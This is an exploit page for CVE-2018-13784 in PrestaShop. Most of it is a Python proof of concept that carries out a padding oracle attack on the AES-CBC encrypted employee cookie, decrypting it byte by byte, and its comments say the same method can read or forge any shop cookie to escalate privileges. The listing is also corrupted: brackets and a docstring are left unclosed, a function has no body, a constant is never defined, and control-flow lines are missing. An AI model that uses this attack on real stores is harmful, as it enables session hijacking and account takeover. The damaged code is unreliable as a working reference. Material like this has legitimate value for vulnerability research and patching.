PrestaShop < - 'AES CBC' Privilege Escalation

Related Vulnerabilities: CVE-2018-13784  
Publish Date: 16 Jul 2018
Author: Charles Fol

                #!/usr/bin/env python3
# PrestaShop &lt;= AES (Rijndael) / openssl_encrypt() Cookie Read
# Charles Fol
# See
# This POC will reveal the content of an employee's cookie.
# By modifying it one can read/write any PrestaShop cookie.
# It is a simple padding oracle implementation.

import requests
import urllib.parse
import base64

s = requests.Session()
s.proxies = {
    'http': 'localhost:8080',
    'https': 'localhost:8080',

# Login as an employee, get your cookie and paste it here along with the URL
URL = "http://vmweb5/prestashop/admin177chuncw/"
cookie = "PrestaShop-b0ebb4f17b3e451202e5b044e29ed75d=20NxjuYuGVhSt8n0M54Av9Qkpyzl9axkK%2BGgLLCcv0MLQZhLAEV8lnq6U2Ew2n5aMUOYqkrkpqjputuLiBEqqW7pIce8cUv%2F3SEFp3tPnWfCgJgXKUsR1htOQ4KAoXyYLhoc31kVgcm39OhQh5Zg3A78HnO1On2udHwN8dTRdI86kewEFZPNtmMeBF7sAr9zezevsjK1VU4BI84EVXCYQuuhnVehoqfAa9XoZC%2FD3FEmDSuspZw2AUB0S7Py6ks6eEeCVDWieBKDsHD13UK%2FzgM%2F65m5rpU1P4BSQSHN2Qs%3D000208"

# Parse blocks and size
cookie_name, cookie_value = cookie.split("=")
cookie_value = urllib.parse.unquote(cookie_value)
cookie_size = cookie_value[-6:]
cookie_value = cookie_value[:-6]
cookie_value = base64.b64decode(cookie_value)


def test_padding(data):
    """Returns true if the padding is correct, false otherwise.
    One can easily adapt it for customer cookies using:
    data = base64.b64encode(data).decode()
    data = urllib.parse.quote(data)
    data = data + cookie_size
    s.cookies[cookie_name] = data
    r = s.get(URL, allow_redirects=False)
    return 'AdminLogin' not in r.headers.get('Location', '')

def e(msg):

if not test_padding(cookie_value):
    e("Invalid cookie (1)")
elif test_padding(b"~~~~~"):
    e("Invalid cookie (2)")

# Perform the padding oracle attack

result = b''

for b in range(1, len(cookie_value) // BLOCK_SIZE + 1):
    obtained = []
    current_block   = cookie_value[(b    ) * BLOCK_SIZE:][:BLOCK_SIZE]
    precedent_block = cookie_value[(b - 1) * BLOCK_SIZE:][:BLOCK_SIZE]

    for p in range(BLOCK_SIZE):
        nb_obtained = len(obtained)

        for i in range(256):
            pad = nb_obtained + 1
            prelude = (
                b"\x00" * (BLOCK_SIZE - pad) +
                bytes([i]) +
                bytes([o ^ pad for o in obtained][::-1])
            data = cookie_value + prelude + current_block

            if test_padding(data):
                print("Got byte #%d of block #%d: %d" % (p, b, i))
                obtained.append(i ^ pad)
            e("Unable to decode position %d" % p)

    # Compute the contents of the plaintext block

    result += bytes([o ^ p for p, o in zip(precedent_block, obtained[::-1])])
        print("COOKIE: %s" % result.decode())
    except UnicodeDecodeError:
        print("COOKIE: Unable to decode, wait for next block")